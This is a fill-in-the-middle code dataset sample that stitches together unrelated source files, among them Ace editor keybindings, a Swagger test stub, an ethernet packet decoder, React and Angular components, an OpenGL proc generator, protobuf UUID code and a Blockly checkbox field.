"copylinesdown" }, { bindKey: {mac: "Command-Shift-K", win: "Ctrl-Shift-K"}, name: "removeline" }, { bindKey: {mac: "Command-Enter", win: "Ctrl-Enter"}, name: "addLineAfter" }, { bindKey: {mac: "Command-Shift-Enter", win: "Ctrl-Shift-Enter"}, name: "addLineBefore" }, { bindKey: {mac: "Command-Shift-\\", win: "Ctrl-Shift-\\"}, name: "jumptomatching" }, { bindKey: {mac: "Command-]", win: "Ctrl-]"}, name: "blockindent" }, { bindKey: {mac: "Command-[", win: "Ctrl-["}, name: "blockoutdent" }, { bindKey: {mac: "Ctrl-PageDown", win: "Alt-PageDown"}, name: "pagedown" }, { bindKey: {mac: "Ctrl-PageUp", win: "Alt-PageUp"}, name: "pageup" }, { bindKey: {mac: "Shift-Option-A", win: "Shift-Alt-A"}, name: "toggleBlockComment" }, { bindKey: {mac: "Option-Z", win: "Alt-Z"}, name: "toggleWordWrap" }, { bindKey: {mac: "Command-G", win: "F3|Ctrl-K Ctrl-D"}, name: "findnext" }, { bindKey: {mac: "Command-Shift-G", win: "Shift-F3"}, name: "findprevious" }, { bindKey: {mac: "Option-Enter", win: "Alt-Enter"}, name: "selectAllMatches" }, { bindKey: {mac: "Command-D", win: "Ctrl-D"}, name: "selectMoreAfter" }, { bindKey: {mac: "Command-K Command-D", win: "Ctrl-K Ctrl-D"}, name: "selectOrFindNext" }, { bindKey: {mac: "Shift-Option-I", win: "Shift-Alt-I"}, name: "splitSelectionIntoLines" }, { bindKey: {mac: "Command-K M", win: "Ctrl-K M"}, name: "modeSelect" }, { bindKey: {mac: "Command-Option-[", win: "Ctrl-Shift-["}, name: "toggleFoldWidget" }, { bindKey: {mac: "Command-Option-]", win: "Ctrl-Shift-]"}, name: "toggleFoldWidget" }, { bindKey: {mac: "Command-K Command-0", win: "Ctrl-K Ctrl-0"}, name: "foldall" }, { bindKey: {mac: "Command-K Command-J", win: "Ctrl-K Ctrl-J"}, name: "unfoldall" }, { bindKey: { mac: "Command-K Command-1", win: "Ctrl-K Ctrl-1" }, name: "foldOther" }, { bindKey: { mac: "Command-K Command-Q", win: "Ctrl-K Ctrl-Q" }, name: "navigateToLastEditLocation" }, { bindKey: { mac: "Command-K Command-R|Command-K Command-S", win: "Ctrl-K Ctrl-R|Ctrl-K Ctrl-S" }, name: "showKeyboardShortcuts" }, { bindKey: { mac: "Command-K Command-X", win: "Ctrl-K Ctrl-X" }, name: "trimTrailingSpace" }, { bindKey: {mac: "Shift-Down|Command-Shift-Down", win: "Shift-Down|Ctrl-Shift-Down"}, name: "selectdown" }, { bindKey: {mac: "Shift-Up|Command-Shift-Up", win: "Shift-Up|Ctrl-Shift-Up"}, name: "selectup" }, { bindKey: {mac: "Command-Alt-Enter", win: "Ctrl-Alt-Enter"}, name: "replaceAll" }, { bindKey: {mac: "Command-Shift-1", win: "Ctrl-Shift-1"}, name: "replaceOne" }, { bindKey: {mac: "Option-C", win: "Alt-C"}, name: "toggleFindCaseSensitive" }, { bindKey: {mac: "Option-L", win: "Alt-L"}, name: "toggleFindInSelection" }, { bindKey: {mac: "Option-R", win: "Alt-R"}, name: "toggleFindRegex" }, { bindKey: {mac: "Option-W", win: "Alt-W"}, name: "toggleFindWholeWord" }, { bindKey: {mac: "Command-L", win: "Ctrl-L"}, name: "expandtoline" }, { bindKey: {mac: "Shift-Esc", win: "Shift-Esc"}, name: "removeSecondaryCursors" } ].forEach(function(binding) { var command = exports.handler.commands[binding.name]; if (command) command.bindKey = binding.bindKey; exports.handler.bindKey(binding.bindKey, command || binding.name); }); }); (function() { ace.require(["ace/keyboard/vscode"], function(m) { if (typeof module == "object" && typeof exports == "object" && module) { module.exports = m; } }); })();<|fim▁end|>
}, { bindKey: {mac: "Shift-F8|Shift-Option-F8", win: "Shift-F8|Shift-Alt-F8"},
<|file_name|>test_add_product_to_cart_request.py<|end_file_name|><|fim▁begin|># coding: utf-8 """ Server API Reference for Server API (REST/Json) OpenAPI spec version: 2.0.6 Generated by: https://github.com/swagger-api/swagger-codegen.git<|fim▁hole|>""" from __future__ import absolute_import import os import sys import unittest import kinow_client from kinow_client.rest import ApiException from kinow_client.models.add_product_to_cart_request import AddProductToCartRequest class TestAddProductToCartRequest(unittest.TestCase): """ AddProductToCartRequest unit test stubs """ def setUp(self): pass def tearDown(self): pass def testAddProductToCartRequest(self): """ Test AddProductToCartRequest """ model = kinow_client.models.add_product_to_cart_request.AddProductToCartRequest() if __name__ == '__main__': unittest.main()<|fim▁end|>
<|file_name|>ethernet.py<|end_file_name|><|fim▁begin|>#=============================================================================== # Copyright 2012 NetApp, Inc. All Rights Reserved, # contribution by Jorge Mora <[email protected]> # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. #=============================================================================== """ ETHERNET module Decode ethernet layer (RFC 894) Ethernet II. """ import nfstest_config as c from baseobj import BaseObj from macaddr import MacAddr from packet.internet.ipv4 import IPv4 from packet.internet.ipv6 import IPv6 from packet.internet.arp import ARP,RARP # Module constants __author__ = "Jorge Mora (%s)" % c.NFSTEST_AUTHOR_EMAIL __copyright__ = "Copyright (C) 2012 NetApp, Inc." __license__ = "GPL v2"<|fim▁hole|>_ETHERNET_map = { 0x0800: 'IPv4', 0x86dd: 'IPv6', 0x0806: 'ARP', 0x8035: 'RARP', } class ETHERNET(BaseObj): """Ethernet object Usage: from packet.link.ethernet import ETHERNET x = ETHERNET(pktt) Object definition: ETHERNET( dst = MacAddr(), # destination MAC address src = MacAddr(), # source MAC address type = int, # payload type data = string, # raw data of payload if type is not supported ) """ # Class attributes _attrlist = ("dst", "src", "type", "data") def __init__(self, pktt): """Constructor Initialize object's private data. pktt: Packet trace object (packet.pktt.Pktt) so this layer has access to the parent layers. """ unpack = pktt.unpack ulist = unpack.unpack(14, "!6s6sH") self.dst = MacAddr(ulist[0].encode('hex')) self.src = MacAddr(ulist[1].encode('hex')) self.type = ulist[2] pktt.pkt.ethernet = self if self.type == 0x0800: # Decode IPv4 packet IPv4(pktt) elif self.type == 0x86dd: # Decode IPv6 packet IPv6(pktt) elif self.type == 0x0806: # Decode ARP packet ARP(pktt) elif self.type == 0x8035: # Decode RARP packet RARP(pktt) else: self.data = unpack.getbytes() def __str__(self): """String representation of object The representation depends on the verbose level set by debug_repr(). If set to 0 the generic object representation is returned. If set to 1 the representation of the object is condensed: '00:0c:29:54:09:ef -> 60:33:4b:29:6e:9d ' If set to 2 the representation of the object also includes the type of payload: '00:0c:29:54:09:ef -> 60:33:4b:29:6e:9d, type: 0x800(IPv4)' """ rdebug = self.debug_repr() if rdebug == 1: out = "%s -> %s " % (self.src, self.dst) elif rdebug == 2: etype = _ETHERNET_map.get(self.type, None) etype = hex(self.type) if etype is None else "%s(%s)" % (hex(self.type), etype) out = "%s -> %s, type: %s" % (self.src, self.dst, etype) else: out = BaseObj.__str__(self) return out<|fim▁end|>
__version__ = "1.1"
<|file_name|>Drawer.component.tsx<|end_file_name|><|fim▁begin|>import React from 'react'; import { Disclosure, DisclosureContent, useDisclosureState } from 'reakit'; import { ButtonComponentType } from '../Button'; import * as S from './Drawer.style'; import { ButtonProps } from '../Button/Button'; export type DrawerProps = { toggleButton?: React.ReactElement<ButtonProps, ButtonComponentType>; heading?: React.ReactNodeArray | React.ReactNode; footer?: React.ReactNodeArray | React.ReactNode; visible: boolean; children: React.ReactNode | React.ReactNodeArray; }; export const Drawer = React.forwardRef( ({ toggleButton, heading, children, footer, visible, ...props }: DrawerProps, ref) => { const state = useDisclosureState({ animated: true, visible }); const { setVisible } = state; React.useEffect(() => { setVisible(visible); }, [setVisible, visible]); return ( <> {toggleButton && ( <Disclosure {...state}> {disclosureProps => React.cloneElement(toggleButton, disclosureProps)} </Disclosure> )} {state.visible && ( <DisclosureContent {...state} {...props} as={S.Drawer} ref={ref}> {heading && <S.DrawerHeading>{heading}</S.DrawerHeading>} <S.DrawerBody>{children}</S.DrawerBody> {footer && <S.DrawerFooter>{footer}</S.DrawerFooter>} </DisclosureContent> )} </> );<|fim▁hole|> export default Drawer;<|fim▁end|>
}, );
<|file_name|>glproc.py<|end_file_name|><|fim▁begin|>########################################################################## # # Copyright 2010 VMware, Inc. # All Rights Reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # ##########################################################################/ """Generated an header, glproc.hpp, which does pretty much what GLEW does, but covers all the functions we support. """ import specs.stdapi as stdapi from dispatch import Dispatcher from specs.glapi import glapi from specs.glxapi import glxapi from specs.wglapi import wglapi from specs.cglapi import cglapi from specs.eglapi import eglapi from specs.glesapi import glesapi # See http://www.opengl.org/registry/ABI/ public_symbols = set([ # GL 1.2 and ARB_multitexture "glAccum", "glAlphaFunc", "glAreTexturesResident", "glArrayElement", "glBegin", "glBindTexture", "glBitmap", "glBlendFunc", "glCallList", "glCallLists", "glClear", "glClearAccum", "glClearColor", "glClearDepth", "glClearIndex", "glClearStencil", "glClipPlane", "glColor3b", "glColor3bv", "glColor3d", "glColor3dv", "glColor3f", "glColor3fv", "glColor3i", "glColor3iv", "glColor3s", "glColor3sv", "glColor3ub", "glColor3ubv", "glColor3ui", "glColor3uiv", "glColor3us", "glColor3usv", "glColor4b", "glColor4bv", "glColor4d",<|fim▁hole|> "glColor4dv", "glColor4f", "glColor4fv", "glColor4i", "glColor4iv", "glColor4s", "glColor4sv", "glColor4ub", "glColor4ubv", "glColor4ui", "glColor4uiv", "glColor4us", "glColor4usv", "glColorMask", "glColorMaterial", "glColorPointer", "glCopyPixels", "glCopyTexImage1D", "glCopyTexImage2D", "glCopyTexSubImage1D", "glCopyTexSubImage2D", "glCullFace", "glDeleteLists", "glDeleteTextures", "glDepthFunc", "glDepthMask", "glDepthRange", "glDisable", "glDisableClientState", "glDrawArrays", "glDrawBuffer", "glDrawElements", "glDrawPixels", "glEdgeFlag", "glEdgeFlagPointer", "glEdgeFlagv", "glEnable", "glEnableClientState", "glEnd", "glEndList", "glEvalCoord1d", "glEvalCoord1dv", "glEvalCoord1f", "glEvalCoord1fv", "glEvalCoord2d", "glEvalCoord2dv", "glEvalCoord2f", "glEvalCoord2fv", "glEvalMesh1", "glEvalMesh2", "glEvalPoint1", "glEvalPoint2", "glFeedbackBuffer", "glFinish", "glFlush", "glFogf", "glFogfv", "glFogi", "glFogiv", "glFrontFace", "glFrustum", "glGenLists", "glGenTextures", "glGetBooleanv", "glGetClipPlane", "glGetDoublev", "glGetError", "glGetFloatv", "glGetIntegerv", "glGetLightfv", "glGetLightiv", "glGetMapdv", "glGetMapfv", "glGetMapiv", "glGetMaterialfv", "glGetMaterialiv", "glGetPixelMapfv", 
"glGetPixelMapuiv", "glGetPixelMapusv", "glGetPointerv", "glGetPolygonStipple", "glGetString", "glGetTexEnvfv", "glGetTexEnviv", "glGetTexGendv", "glGetTexGenfv", "glGetTexGeniv", "glGetTexImage", "glGetTexLevelParameterfv", "glGetTexLevelParameteriv", "glGetTexParameterfv", "glGetTexParameteriv", "glHint", "glIndexMask", "glIndexPointer", "glIndexd", "glIndexdv", "glIndexf", "glIndexfv", "glIndexi", "glIndexiv", "glIndexs", "glIndexsv", "glIndexub", "glIndexubv", "glInitNames", "glInterleavedArrays", "glIsEnabled", "glIsList", "glIsTexture", "glLightModelf", "glLightModelfv", "glLightModeli", "glLightModeliv", "glLightf", "glLightfv", "glLighti", "glLightiv", "glLineStipple", "glLineWidth", "glListBase", "glLoadIdentity", "glLoadMatrixd", "glLoadMatrixf", "glLoadName", "glLogicOp", "glMap1d", "glMap1f", "glMap2d", "glMap2f", "glMapGrid1d", "glMapGrid1f", "glMapGrid2d", "glMapGrid2f", "glMaterialf", "glMaterialfv", "glMateriali", "glMaterialiv", "glMatrixMode", "glMultMatrixd", "glMultMatrixf", "glNewList", "glNormal3b", "glNormal3bv", "glNormal3d", "glNormal3dv", "glNormal3f", "glNormal3fv", "glNormal3i", "glNormal3iv", "glNormal3s", "glNormal3sv", "glNormalPointer", "glOrtho", "glPassThrough", "glPixelMapfv", "glPixelMapuiv", "glPixelMapusv", "glPixelStoref", "glPixelStorei", "glPixelTransferf", "glPixelTransferi", "glPixelZoom", "glPointSize", "glPolygonMode", "glPolygonOffset", "glPolygonStipple", "glPopAttrib", "glPopClientAttrib", "glPopMatrix", "glPopName", "glPrioritizeTextures", "glPushAttrib", "glPushClientAttrib", "glPushMatrix", "glPushName", "glRasterPos2d", "glRasterPos2dv", "glRasterPos2f", "glRasterPos2fv", "glRasterPos2i", "glRasterPos2iv", "glRasterPos2s", "glRasterPos2sv", "glRasterPos3d", "glRasterPos3dv", "glRasterPos3f", "glRasterPos3fv", "glRasterPos3i", "glRasterPos3iv", "glRasterPos3s", "glRasterPos3sv", "glRasterPos4d", "glRasterPos4dv", "glRasterPos4f", "glRasterPos4fv", "glRasterPos4i", "glRasterPos4iv", "glRasterPos4s", "glRasterPos4sv", "glReadBuffer", "glReadPixels", "glRectd", "glRectdv", "glRectf", "glRectfv", "glRecti", "glRectiv", "glRects", "glRectsv", "glRenderMode", "glRotated", "glRotatef", "glScaled", "glScalef", "glScissor", "glSelectBuffer", "glShadeModel", "glStencilFunc", "glStencilMask", "glStencilOp", "glTexCoord1d", "glTexCoord1dv", "glTexCoord1f", "glTexCoord1fv", "glTexCoord1i", "glTexCoord1iv", "glTexCoord1s", "glTexCoord1sv", "glTexCoord2d", "glTexCoord2dv", "glTexCoord2f", "glTexCoord2fv", "glTexCoord2i", "glTexCoord2iv", "glTexCoord2s", "glTexCoord2sv", "glTexCoord3d", "glTexCoord3dv", "glTexCoord3f", "glTexCoord3fv", "glTexCoord3i", "glTexCoord3iv", "glTexCoord3s", "glTexCoord3sv", "glTexCoord4d", "glTexCoord4dv", "glTexCoord4f", "glTexCoord4fv", "glTexCoord4i", "glTexCoord4iv", "glTexCoord4s", "glTexCoord4sv", "glTexCoordPointer", "glTexEnvf", "glTexEnvfv", "glTexEnvi", "glTexEnviv", "glTexGend", "glTexGendv", "glTexGenf", "glTexGenfv", "glTexGeni", "glTexGeniv", "glTexImage1D", "glTexImage2D", "glTexParameterf", "glTexParameterfv", "glTexParameteri", "glTexParameteriv", "glTexSubImage1D", "glTexSubImage2D", "glTranslated", "glTranslatef", "glVertex2d", "glVertex2dv", "glVertex2f", "glVertex2fv", "glVertex2i", "glVertex2iv", "glVertex2s", "glVertex2sv", "glVertex3d", "glVertex3dv", "glVertex3f", "glVertex3fv", "glVertex3i", "glVertex3iv", "glVertex3s", "glVertex3sv", "glVertex4d", "glVertex4dv", "glVertex4f", "glVertex4fv", "glVertex4i", "glVertex4iv", "glVertex4s", "glVertex4sv", "glVertexPointer", "glViewport", # GLX 1.3 and 
GLX_ARB_get_proc_address "glXChooseVisual", "glXCreateContext", "glXDestroyContext", "glXMakeCurrent", "glXCopyContext", "glXSwapBuffers", "glXCreateGLXPixmap", "glXDestroyGLXPixmap", "glXQueryExtension", "glXQueryVersion", "glXIsDirect", "glXGetConfig", "glXGetCurrentContext", "glXGetCurrentDrawable", "glXWaitGL", "glXWaitX", "glXUseXFont", "glXQueryExtensionsString", "glXQueryServerString", "glXGetClientString", "glXGetCurrentDisplay", "glXChooseFBConfig", "glXGetFBConfigAttrib", "glXGetFBConfigs", "glXGetVisualFromFBConfig", "glXCreateWindow", "glXDestroyWindow", "glXCreatePixmap", "glXDestroyPixmap", "glXCreatePbuffer", "glXDestroyPbuffer", "glXQueryDrawable", "glXCreateNewContext", "glXMakeContextCurrent", "glXGetCurrentReadDrawable", "glXQueryContext", "glXSelectEvent", "glXGetSelectedEvent", "glXGetProcAddressARB", "glXGetProcAddress", # WGL #"glDebugEntry", "wglChoosePixelFormat", "wglCopyContext", "wglCreateContext", "wglCreateLayerContext", "wglDeleteContext", "wglDescribeLayerPlane", "wglDescribePixelFormat", "wglGetCurrentContext", "wglGetCurrentDC", "wglGetDefaultProcAddress", "wglGetLayerPaletteEntries", "wglGetPixelFormat", "wglGetProcAddress", "wglMakeCurrent", "wglRealizeLayerPalette", "wglSetLayerPaletteEntries", "wglSetPixelFormat", "wglShareLists", "wglSwapBuffers", "wglSwapLayerBuffers", "wglSwapMultipleBuffers", "wglUseFontBitmapsA", "wglUseFontBitmapsW", "wglUseFontOutlinesA", "wglUseFontOutlinesW", ]) # EGL 1.4 public_symbols.update([ "eglBindAPI", "eglBindTexImage", "eglChooseConfig", "eglCopyBuffers", "eglCreateContext", "eglCreatePbufferFromClientBuffer", "eglCreatePbufferSurface", "eglCreatePixmapSurface", "eglCreateWindowSurface", "eglDestroyContext", "eglDestroySurface", "eglGetConfigAttrib", "eglGetConfigs", "eglGetCurrentContext", "eglGetCurrentDisplay", "eglGetCurrentSurface", "eglGetDisplay", "eglGetError", "eglGetProcAddress", "eglInitialize", "eglMakeCurrent", "eglQueryAPI", "eglQueryContext", "eglQueryString", "eglQuerySurface", "eglReleaseTexImage", "eglReleaseThread", "eglSurfaceAttrib", "eglSwapBuffers", "eglSwapInterval", "eglTerminate", "eglWaitClient", "eglWaitGL", "eglWaitNative", ]) class GlDispatcher(Dispatcher): def header(self): print ''' #if defined(_WIN32) extern HINSTANCE __libGlHandle; #else extern void * __libGlHandle; #endif void * __getPublicProcAddress(const char *procName); void * __getPrivateProcAddress(const char *procName); ''' def is_public_function(self, function): return function.name in public_symbols or function.name.startswith('CGL') if __name__ == '__main__': print print '#ifndef _GLPROC_HPP_' print '#define _GLPROC_HPP_' print print '#include "glimports.hpp"' print '#include "os.hpp"' print print dispatcher = GlDispatcher() dispatcher.header() print '#if defined(TRACE_EGL)' print dispatcher.dispatch_api(eglapi) print '#elif defined(_WIN32)' print dispatcher.dispatch_api(wglapi) print '#elif defined(__APPLE__)' dispatcher.dispatch_api(cglapi) print '#else' print dispatcher.dispatch_api(glxapi) print '#endif' print dispatcher.dispatch_api(glapi) print dispatcher.dispatch_api(glesapi) print print '#endif /* !_GLPROC_HPP_ */' print<|fim▁end|>
<|file_name|>configuration-inspector-chart-manager-container.component.ts<|end_file_name|><|fim▁begin|>import { Component, OnInit } from '@angular/core'; import { Subject } from 'rxjs'; import { takeUntil } from 'rxjs/operators'; import { Actions } from 'app/shared/store'; import { StoreHelperService } from 'app/shared/services'; import { InspectorChartListDataService, SOURCE_TYPE } from '../inspector-chart-list/inspector-chart-list-data.service'; @Component({ selector: 'pp-configuration-inspector-chart-manager-container', templateUrl: './configuration-inspector-chart-manager-container.component.html', styleUrls: ['./configuration-inspector-chart-manager-container.component.css'] }) export class ConfigurationInspectorChartManagerContainerComponent implements OnInit { private unsubscribe: Subject<null> = new Subject(); constructor( private storeHelperService: StoreHelperService, private inspectorChartListDataService: InspectorChartListDataService<|fim▁hole|> ngOnInit() { this.inspectorChartListDataService.getChartLayoutInfo(SOURCE_TYPE.APPLICATION_INSPECTOR).pipe( takeUntil(this.unsubscribe) ).subscribe((applicationData: {[key: string]: IChartLayoutInfo[]}) => { this.storeHelperService.dispatch(new Actions.UpdateApplicationInspectorChartLayout(applicationData)); }, (error: IServerErrorFormat) => { this.storeHelperService.dispatch(new Actions.UpdateApplicationInspectorChartLayout({ applicationInspectorChart: [] })); }); this.inspectorChartListDataService.getChartLayoutInfo(SOURCE_TYPE.AGENT_INSPECTOR).pipe( takeUntil(this.unsubscribe) ).subscribe((agentData: {[key: string]: IChartLayoutInfo[]}) => { this.storeHelperService.dispatch(new Actions.UpdateAgentInspectorChartLayout(agentData)); }, (error: IServerErrorFormat) => { this.storeHelperService.dispatch(new Actions.UpdateAgentInspectorChartLayout({ applicationInspectorChart: [] })); }); } }<|fim▁end|>
) {}
<|file_name|>uuid.pb.go<|end_file_name|><|fim▁begin|>// Code generated by protoc-gen-gogo. // source: uuid.proto // DO NOT EDIT! package events import proto "github.com/gogo/protobuf/proto" import math "math" // discarding unused import gogoproto "github.com/gogo/protobuf/gogoproto/gogo.pb" import io "io" import fmt "fmt" import github_com_gogo_protobuf_proto "github.com/gogo/protobuf/proto" // Reference imports to suppress errors if they are not otherwise used. var _ = proto.Marshal var _ = math.Inf // / Type representing a 128-bit UUID. // // The bytes of the UUID should be packed in little-endian **byte** (not bit) order. For example, the UUID `f47ac10b-58cc-4372-a567-0e02b2c3d479` should be encoded as `UUID{ low: 0x7243cc580bc17af4, high: 0x79d4c3b2020e67a5 }` type UUID struct { Low *uint64 `protobuf:"varint,1,req,name=low" json:"low,omitempty"` High *uint64 `protobuf:"varint,2,req,name=high" json:"high,omitempty"` XXX_unrecognized []byte `json:"-"` } func (m *UUID) Reset() { *m = UUID{} } func (m *UUID) String() string { return proto.CompactTextString(m) } func (*UUID) ProtoMessage() {} func (m *UUID) GetLow() uint64 { if m != nil && m.Low != nil { return *m.Low } return 0 } func (m *UUID) GetHigh() uint64 { if m != nil && m.High != nil { return *m.High } return 0 } func init() { } func (m *UUID) Unmarshal(data []byte) error { var hasFields [1]uint64 l := len(data) iNdEx := 0 for iNdEx < l { var wire uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++<|fim▁hole|> } } fieldNum := int32(wire >> 3) wireType := int(wire & 0x7) switch fieldNum { case 1: if wireType != 0 { return fmt.Errorf("proto: wrong wireType = %d for field Low", wireType) } var v uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ v |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } m.Low = &v hasFields[0] |= uint64(0x00000001) case 2: if wireType != 0 { return fmt.Errorf("proto: wrong wireType = %d for field High", wireType) } var v uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ v |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } m.High = &v hasFields[0] |= uint64(0x00000002) default: var sizeOfWire int for { sizeOfWire++ wire >>= 7 if wire == 0 { break } } iNdEx -= sizeOfWire skippy, err := skipUuid(data[iNdEx:]) if err != nil { return err } if (iNdEx + skippy) > l { return io.ErrUnexpectedEOF } m.XXX_unrecognized = append(m.XXX_unrecognized, data[iNdEx:iNdEx+skippy]...) 
iNdEx += skippy } } if hasFields[0]&uint64(0x00000001) == 0 { return github_com_gogo_protobuf_proto.NewRequiredNotSetError("low") } if hasFields[0]&uint64(0x00000002) == 0 { return github_com_gogo_protobuf_proto.NewRequiredNotSetError("high") } return nil } func skipUuid(data []byte) (n int, err error) { l := len(data) iNdEx := 0 for iNdEx < l { var wire uint64 for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } wireType := int(wire & 0x7) switch wireType { case 0: for { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } iNdEx++ if data[iNdEx-1] < 0x80 { break } } return iNdEx, nil case 1: iNdEx += 8 return iNdEx, nil case 2: var length int for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ length |= (int(b) & 0x7F) << shift if b < 0x80 { break } } iNdEx += length return iNdEx, nil case 3: for { var wire uint64 var start int = iNdEx for shift := uint(0); ; shift += 7 { if iNdEx >= l { return 0, io.ErrUnexpectedEOF } b := data[iNdEx] iNdEx++ wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break } } wireType := int(wire & 0x7) if wireType == 4 { break } next, err := skipUuid(data[start:]) if err != nil { return 0, err } iNdEx = start + next } return iNdEx, nil case 4: return iNdEx, nil case 5: iNdEx += 4 return iNdEx, nil default: return 0, fmt.Errorf("proto: illegal wireType %d", wireType) } } panic("unreachable") } func (m *UUID) Size() (n int) { var l int _ = l if m.Low != nil { n += 1 + sovUuid(uint64(*m.Low)) } if m.High != nil { n += 1 + sovUuid(uint64(*m.High)) } if m.XXX_unrecognized != nil { n += len(m.XXX_unrecognized) } return n } func sovUuid(x uint64) (n int) { for { n++ x >>= 7 if x == 0 { break } } return n } func sozUuid(x uint64) (n int) { return sovUuid(uint64((x << 1) ^ uint64((int64(x) >> 63)))) } func (m *UUID) Marshal() (data []byte, err error) { size := m.Size() data = make([]byte, size) n, err := m.MarshalTo(data) if err != nil { return nil, err } return data[:n], nil } func (m *UUID) MarshalTo(data []byte) (n int, err error) { var i int _ = i var l int _ = l if m.Low == nil { return 0, github_com_gogo_protobuf_proto.NewRequiredNotSetError("low") } else { data[i] = 0x8 i++ i = encodeVarintUuid(data, i, uint64(*m.Low)) } if m.High == nil { return 0, github_com_gogo_protobuf_proto.NewRequiredNotSetError("high") } else { data[i] = 0x10 i++ i = encodeVarintUuid(data, i, uint64(*m.High)) } if m.XXX_unrecognized != nil { i += copy(data[i:], m.XXX_unrecognized) } return i, nil } func encodeFixed64Uuid(data []byte, offset int, v uint64) int { data[offset] = uint8(v) data[offset+1] = uint8(v >> 8) data[offset+2] = uint8(v >> 16) data[offset+3] = uint8(v >> 24) data[offset+4] = uint8(v >> 32) data[offset+5] = uint8(v >> 40) data[offset+6] = uint8(v >> 48) data[offset+7] = uint8(v >> 56) return offset + 8 } func encodeFixed32Uuid(data []byte, offset int, v uint32) int { data[offset] = uint8(v) data[offset+1] = uint8(v >> 8) data[offset+2] = uint8(v >> 16) data[offset+3] = uint8(v >> 24) return offset + 4 } func encodeVarintUuid(data []byte, offset int, v uint64) int { for v >= 1<<7 { data[offset] = uint8(v&0x7f | 0x80) v >>= 7 offset++ } data[offset] = uint8(v) return offset + 1 }<|fim▁end|>
wire |= (uint64(b) & 0x7F) << shift if b < 0x80 { break
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright (c) The Diem Core Contributors<|fim▁hole|><|fim▁end|>
// SPDX-License-Identifier: Apache-2.0 pub mod mock_vm_validator;
<|file_name|>field_checkbox.js<|end_file_name|><|fim▁begin|>/** * @license * Copyright 2012 Google LLC * SPDX-License-Identifier: Apache-2.0 */ /** * @fileoverview Checkbox field. Checked or not checked. * @author [email protected] (Neil Fraser) */ 'use strict'; goog.provide('Blockly.FieldCheckbox'); /** @suppress {extraRequire} */ goog.require('Blockly.Events.BlockChange'); goog.require('Blockly.Field'); goog.require('Blockly.fieldRegistry'); goog.require('Blockly.utils.dom'); goog.require('Blockly.utils.object'); /** * Class for a checkbox field. * @param {string|boolean=} opt_value The initial value of the field. Should * either be 'TRUE', 'FALSE' or a boolean. Defaults to 'FALSE'. * @param {Function=} opt_validator A function that is called to validate * changes to the field's value. Takes in a value ('TRUE' or 'FALSE') & * returns a validated value ('TRUE' or 'FALSE'), or null to abort the * change. * @param {Object=} opt_config A map of options used to configure the field. * See the [field creation documentation]{@link https://developers.google.com/blockly/guides/create-custom-blocks/fields/built-in-fields/checkbox#creation} * for a list of properties this parameter supports. * @extends {Blockly.Field} * @constructor */ Blockly.FieldCheckbox = function(opt_value, opt_validator, opt_config) { /** * Character for the check mark. Used to apply a different check mark * character to individual fields. * @type {?string} * @private */ this.checkChar_ = null; Blockly.FieldCheckbox.superClass_.constructor.call( this, opt_value, opt_validator, opt_config); }; Blockly.utils.object.inherits(Blockly.FieldCheckbox, Blockly.Field); /** * The default value for this field. * @type {*} * @protected */ Blockly.FieldCheckbox.prototype.DEFAULT_VALUE = false; /** * Construct a FieldCheckbox from a JSON arg object. * @param {!Object} options A JSON object with options (checked). * @return {!Blockly.FieldCheckbox} The new field instance. * @package * @nocollapse */ Blockly.FieldCheckbox.fromJson = function(options) { return new Blockly.FieldCheckbox(options['checked'], undefined, options); }; /** * Default character for the checkmark. * @type {string} * @const */ Blockly.FieldCheckbox.CHECK_CHAR = '\u2713'; /** * Serializable fields are saved by the XML renderer, non-serializable fields * are not. Editable fields should also be serializable. * @type {boolean} */ Blockly.FieldCheckbox.prototype.SERIALIZABLE = true; /** * Mouse cursor style when over the hotspot that initiates editability. */ Blockly.FieldCheckbox.prototype.CURSOR = 'default'; /** * Configure the field based on the given map of options. * @param {!Object} config A map of options to configure the field based on. * @protected * @override */ Blockly.FieldCheckbox.prototype.configure_ = function(config) { Blockly.FieldCheckbox.superClass_.configure_.call(this, config); if (config['checkCharacter']) { this.checkChar_ = config['checkCharacter']; } }; /** * Create the block UI for this checkbox. * @package */ Blockly.FieldCheckbox.prototype.initView = function() { Blockly.FieldCheckbox.superClass_.initView.call(this); Blockly.utils.dom.addClass( /** @type {!SVGTextElement} **/ (this.textElement_), 'blocklyCheckbox'); this.textElement_.style.display = this.value_ ? 
